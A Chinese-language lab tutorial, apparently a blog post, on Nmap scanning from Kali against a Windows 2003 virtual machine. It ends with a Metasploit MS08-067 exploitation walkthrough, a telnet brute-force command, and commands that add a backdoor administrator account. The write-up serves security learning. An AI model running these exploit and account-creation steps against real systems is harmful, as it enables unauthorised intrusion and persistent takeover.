1. 实验目标

本实验可以在虚拟机中搭建windows系列系统进行操作,建议选择老旧的windows xp,windows 7,windows sever2012等系统,这样可以扫描出很多的漏洞,也方便后面做入侵实验。攻击机可以使用kali linux,被攻击机还有肉鸡使用windows系列系统比较好。

2. kali

  • 主机探测:Nmap可査找目标网络中的在线主机。默认情况下,Nmap通过4种方式—— ICMP echo请求(ping)、向443端口发送TCP SYN 包、向80端口发送TCP ACK包和ICMP 时间戳请求——发现目标主机。

  • 服务/版本检测:在发现开放端口后,Nmap可进一步检查目标主机的检测服务协议、应用 程序名称、版本号等信息。

  • 操作系统检测:Nmap 向远程主机发送一系列数据包,并能够将远程主机的响应与操作系统 指纹数据库进行比较。如果发现了匹配结果,它就会显示匹配的操作系统。它确实可能无法 识别目标主机的操作系统;在这种情况下,如果您知道目标系统上使用的何种操作系统,可 在它提供的 URL 里提交有关信息,更新它的操作系统指纹数据库。

  • 网络路由跟踪:它通过多种协议访问目标主机的不同端口,以尽可能访问目标主机。Nmap 路由跟踪功能从TTL的高值开始测试,逐步递减TTL,直到它到零为止。

  • Nmap脚本引擎:这个功能扩充了Nmap的用途。如果您要使用Nmap实现它(在默认情况 下)没有的检测功能,可利用它的脚本引擎手写一个检测脚本。目前,Nmap可检査网络服务 的漏洞,还可以枚举目标系统的资源。

2.1 kali安装

1.kali iso下载:下载地址

2.下载并解压之后,在VMware,选择文件->打开 (不选择新建虚拟机)

3.进入虚拟机之后,直接输入账号密码(默认均为kali),即可进入kali。

3. Nmap

  • Nmap在kali系统中自带,无需下载。

3.1 Nmap入门

  • nmap 192.168.182.132 IP为虚拟机Win2003的IP地址,该指令可以扫描出对外开放的服务。

从结果可以看出88、135、139等端口开放。

  • nmap -p 端口 IP(域名)可以扫描指定端口是否开放

88端口开放

80端口关闭

也可以增加端口和网段:

nmap 192.168.182.1-253

nmap -p 88,80,135 192.168.182.132

扫描该网段的端口信息

  • nmap -sn 192.168.182.1-255:查看这个网段在线的主机

3.2 Nmap进阶

  • nmap -sV 192.168.182.132

该指令可以扫描服务器端软件的版本信息

  • nmap -O 192.168.182.132

该指令可以识别目标主机的操作系统

但需要注意的是,该指令需要root权限,在没有获得权限之前无法扫描

输入sudo su -输入默认密码kali即可获得权限

再次输入nmap -O 192.168.182.132指令

得到目标主机的操作系统等信息

  • -Pn:禁用主机检测

如果主机屏蔽了ping请求,Nmap可能会认为该主机没有开机。这将使得Nmap无法进行进一 步检测,比如端口扫描、服务版本识别和操作系统识别等探测工作。为了克服这一问题,就 需要禁用Nmap的主机检测功能。在指定这个选项之后,Nmap会认为目标主机已经开机并会 进行全套的检测工作

  • 强力检测选项:nmap -A 192.168.182.132

可以得到以下信息:

服务版本识别(-sV);
操作系统识别(-O);
脚本扫描(-sC);
Traceroute(–traceroute)

3.2.1 TCP扫描选项

  1. TCP连接扫描(-sT)

    指定这个选项后,程序将和目标主机的每个端口都进行完整的三次 握手。如果成功建立连接,则判定该端口是开放端口。由于在检测每个端口时都需要进行三 次握手,所以这种扫描方式比较慢,而且扫描行为很可能被目标主机记录下来。如果启动 Nmap的用户的权限不足,那么默认情况下Nmap程序将以这种模式进行扫描。

  2. SYN扫描(-sS):

    该选项也称为半开连接或者SYN stealth。采用该选项后,Nmap将使用 含有SYN标志位的数据包进行端口探测。如果目标主机回复了SYN/ACK包,则说明该端口处 于开放状态:如果回复的是RST/ACK包,则说明这个端口处于关闭状态;如果没有任何响应 或者发送了ICMP unreachable信息,则可认为这个端口被屏蔽了。SYN模式的扫描速度非常 好。而且由于这种模式不会进行三次握手,所以是一种十分隐蔽的扫描方式。如果启动Nmap 的用户有高级别权限,那么在默认情况下Nmap程序将以这种模式进行扫描。

  3. TCP NULL(-sN)、FIN(-sF)及XMAS(-sX)扫描:

    NULL 扫描不设置任何控制位; FIN扫描仅设置FIN标志位:XMAS扫描设置FIN、PSH和URG的标识位。如果目标主机返回 了含有RST标识位的响应数据,则说明该端口处于关闭状态;如果目标主机没有任何回应, 则该端口处于打开|过滤状态。

  4. TCP Maimon扫描(-sM):

    Uriel Maimon 首先发现了TCP Maimom扫描方式。这种模式的 探测数据包含有FIN/ACK标识。对于BSD衍生出来的各种操作系统来说,如果被测端口处于 开放状态,主机将会丢弃这种探测数据包;如果被测端口处于关闭状态,那么主机将会回复 RST。

  5. TCPACK扫描(-sA):

    这种扫描模式可以检测目标系统是否采用了数据包状态监测技术 (stateful)防火墙,并能确定哪些端口被防火墙屏蔽。这种类型的数据包只有一个ACK标识 位。如果目标主机的回复中含有RST标识,则说明目标主机没有被过滤。

  6. TCP窗口扫描(-sW):

    这种扫描方式检测目标返回的RST数据包的TCP窗口字段。如果目 标端口处于开放状态,这个字段的值将是正值;否则它的值应当是0。

  7. TCP Idle扫描(-sI):

    采用这种技术后,您将通过指定的僵尸主机发送扫描数据包。本机 并不与目标主机直接通信。如果对方网络里有IDS,IDS将认为发起扫描的主机是僵尸主机。

3.2.2 UDP扫描选项

Nmap有多种TCP扫描方式,而UDP扫描仅有一种扫描方式(-sU)。虽然UDP扫描结果没有 TCP扫描结果的可靠度高,但渗透测试人员不能因此而轻视UDP扫描,毕竟UDP端口代表着 可能会有价值的服务端程序。但是UDP扫描的最大问题是性能问题。由干Linux内核限制1秒内最多发送一次ICMP Port Unreachable信息。按照这个速度,对一台主机的65536个UDP端口进行完整扫描,总耗时必 定会超过18个小时。

nmap -sU 192.168.182.132 -p 53,161:指定扫描53端口和161端口

  • 使用Wireshark对UDP扫描进行分析:

1.首先在kali终端输入wireshark就可以打开wireshark

2.将IP地址切换到我们的目标地址:192.168.182.132

3.输入指令对1-200号端口进行扫描nmap -sU 192.168.182.132 -p 1-200

4.结果分析

收到的CIMP port unreacha报文,说明对应的端口是关闭或屏蔽的。

3.2.3 将结果输出

  • -oN:不显示runtime信息和警告信息。

  • -0X:生成XML格式文件

  • -oG:生成Grep格式文件

  • -oA:输出所有格式:.xml .nmap .gnmap

3.3 漏洞检测

3.3.1 NSE脚本

Nmap的漏洞检测是通过Nmap的扩展脚本实现的Nmap本身内置有丰富的NSE脚本,可以非常方便的利用起来,当然也可以使用定制化的脚本完成个人的需求。在某些时候,我们大部分都使用Nmap进行扫描,然后再通过Metasploit进行漏洞利用,但是这个过程比较繁琐,一个个漏洞去验证的话还需要打开MSF去设置参数,最后run/exploit。

3.3.2 Metasploit

Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。——维基百科

3.3.3 脚本参数

  • 脚本数量

ls /usr/share/nmap/scripts/ | wc -l

可以看出kali2022.1自带 605个脚本

  • 脚本参数

--script-args=key1=value1,key2=value2...:

传递脚本里的参数,key1是参数名,value1是对应的参数值。

–-script-args-file=filename

使用文件来作为参数。

--script-trace

如果设置该参数,则所有的脚本收发请求过程。

--script-updatedb

在Nmap的scripts目录里有一个script.db,该文件中保存了当前Nmap可用的脚本,类似于一个小型数据库,如果我们开启nmap并且调用了此参数,则nmap会自行扫描scripts目录中的扩展脚本,进行数据库更新。

--script-help=脚本名称

调用该参数后,Nmap会输出该脚本名称对应的脚本使用参数,以及详细介绍信息。

3.3.4 telnet爆破脚本

查询是否有telnet脚本:ls /usr/share/nmap/scripts/ | grep telnet

使用上面提到的--script-help=脚本名称来查看telnet脚本的详细信息nmap --script-help=telnet-brute

可以看到一个文档信息,该文档为telnet脚本的文档。

使用例子:nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>

可以看到,因为23端口是关闭的,所以该指令并没有起作用。

23端口为telnet的端口。

Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。

我们在虚拟机Win2003打开23telnet服务

开始->运行->services.msc

找到Telnet服务(默认是禁用的)->双击->常规->启动类型->改成手动->启动

再次使用talnet脚本进行爆破:

可以看出没有对应字典文件,加上路径后。

nmap -p 23 -Pn --script=telnet-brute --script-args=userdb=/usr/share/nmap/nselib/data/usernames.lst,passdb=/usr/share/nmap/nselib/data/passwords.lst,telnet-brute.timeout=3s --script-trace 192.168.182.132

仍然没有对应的字典。

在修改了对应的字典后,仍然得不到正确的结果,暂时放弃了该实验。

3.3.5 vuln漏洞脚本

该脚本可以对目标主机或网段扫描是否存在常见的漏洞nmap --script=vuln 192.168.182.132

可以看见结果——扫描除了ms08-067、ms17-010、ms10-061漏洞。

利用ms08-067漏洞

  • msfdb init初始化msf框架

msf框架:

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具

  • 启动数据库:service postgresql start
  • 进入metasploit:msfconsole

  • 查找ms08-067漏洞:search ms08-067

  • 使用脚本:use exploit/windows/smb/ms08_067_netapi

可以看出我们并没有设置攻击载荷,默认攻击载荷为windows/meterpreter/reverse_tcp

  • 查看攻击所需的配置选项:show options:

  • 设置靶机IP:set RHOSTS 192.168.182.132

  • 查看靶机系统类型:show targets

因为我们的靶机为Windows 2003,所以选择74

  • 设置靶机类型:set target 74
  • 攻击:exploit


  • 获取权限shell

  • 创建用户:net user attacker 123 /add

  • 提权:net localgroup administrators attacker /add

  • 查看用户:net user attacker

(可能是靶机系统和选择的靶机类型有所差别,所以有乱码显示,但是能看出已经创建了管理员用户attacker)


  • 入侵

因为kali没有远程桌面连接软件,我选择在另外一台Win2003机器上进行远程连接。

在运行中输入:mstsc

可以看出已经入侵了靶机

Nmap扫描工具的使用相关推荐

  1. macOS系统安装NMAP扫描工具

    macOS系统安装NMAP扫描工具 最近做Kali网络渗透测试实验,需要用到一些扫描工具.当然少不了大名鼎鼎的Nmap ("Network Mapper") 工具.Nmap 是一款 ...

  2. Nmap扫描工具使用方法

    Nmap是一款非常强大的网络扫描工具,主要用于扫描网络上的计算机或设备,检查它们开放的端口和服务,并确定它们的操作系统和应用程序版本.下面是Nmap工具的基本使用方法和常用参数: 基本使用方法: nm ...

  3. 强悍的nmap扫描工具

    首先,简单列举一个扫描端口的运用: nmap –sT –sV –p80,443,8080 –P0 –n IP 说明: -sT,说明是TCP协议: -sV,说明是显示详情 -p后面跟指定的扫描端口: - ...

  4. nmap 扫描工具 使用方法

    默认情况下,nmap会发出一个arp ping扫描(如果交换机是ommited,则为-sP),并且它还会扫描特定目标的打开端口,范围为1-10000 以下命令的语法如下: nmap <目标IP地 ...

  5. nmap oracle,[转帖]如何使用nmap扫描工具

    使用 nmap 套件:注意安全! 在本机上面观察 port 最好是使用 netstat 啦!因为他安全又可靠!但是,由于可能有某些 port 会寻找不到,或者不晓得那些 port 是干嘛用的,尤其是 ...

  6. 使用X-SCANNER扫描工具

    使用Nmap 扫描工具 一.实验目的及要求 1.熟悉对计算机的端口进行扫描的原理: 2.熟练使用Nmap扫描工具对计算机的端口进行扫描. 3.使用端口扫描对一台主机进行扫描,并显示出结果( 一台主机上 ...

  7. Linux下安全扫描工具Nmap用法详解

    扫描器是一种能够自动检测主机安全性弱点的程序.扫描器通过发送特定的网络数据包,记录目标主机的应答消息,从而收集关于目标主机的各种信息.目前网络上有很多扫描软件,比较著名的扫描器有SSS,X-Scan, ...

  8. 网络扫描工具Nmap常用命令

    网络扫描工具Nmap常用命令 Nmap是一款知名的网络安全审计工具.它免费.开源,可以快速完成各种网络审计功能.它提供了多种探测方式,基于各种网络协议规范,可以发现网络设备并探测设备的各种常见端口.利 ...

  9. NMAP分布式扫描工具dnmap

    NMAP分布式扫描工具dnmap NMAP是一款知名的网络扫描工具.它提供丰富和强大的网络扫描功能.但很多时候,需要渗透测试人员从多个终端发起扫描任务,以快速扫描大型网络,或规避IP限制等安全策略.而 ...

最新文章

  1. win8和win8.1动态绑定数据到ListView
  2. ajax得到session,Ajax如何使用Session
  3. JDBC的开发流程是什么?
  4. Mac Apache WebDav 服务器配置
  5. jdbc 生成建表语句_JDBC数据库连接怎么操作?
  6. Toast与Snackbar的那点事
  7. Android5.0新控件
  8. 腾讯视频app下载2019_腾讯视频主设备如何设置
  9. Java爬虫系列二:使用HttpClient抓取页面HTML
  10. 使用windows Phone 集成横幅广告教程
  11. go语言语法自我总结
  12. 1人30天44587行代码,分享舍得网开发经验
  13. 拉结尔6月21日服务器维护,《拉结尔》6月19日换端更新公告
  14. 舱机器人尾巴毛茸茸_『新奇玩意』毛茸茸的机器人不仅可撸,还会摇尾巴
  15. MLX90614红外测温模块的使用
  16. 技术期刊 · 白日照耀开鸿蒙 | 深入鸿蒙 ACE UI 框架解析;无限循环的 useEffect 类型;用 Three.js 实现 3D 房间;图神经网络入门;超基础的机器学习入门-原理篇
  17. 流利阅读 2019.1.22 Theresa May loses big over her Brexit deal
  18. 太赞了!没想到一个Handler还有中高级几种问法,进阶学习资料!
  19. 60.left join(左连接)
  20. 爬取安居客租房详情+翻页

热门文章

  1. rpc服务器打开文档,“RPC服务器不可用”解决办法
  2. 三相永磁同步电机(PMSM) 单矢量、占空比、双矢量电流预测控制 MATLA b仿真算法
  3. Vue3+TS+Vite无法使用require导入图片的解决方法
  4. 撩课python视频下载_2018年撩课学院-Python+人工智能/JavaEE/Web全栈/全学科下载_IT教程网...
  5. 制图大赛计算机二维绘图,【科普】关于全国大学生制图大赛的二三事
  6. 营销机器人已全面接入头条落地页,留资营销更高效
  7. 建筑力学与结构【11】
  8. 一种基于卷积神经网络的图像去雾研究-含matlab代码
  9. PS磨皮插件免费电脑版Portraiture4.03下载及使用教程
  10. JAVA451小轮好不好,20寸 406 451的通勤代步用途的小轮, 50/39T的齿比比较安逸, 大家觉得呢?...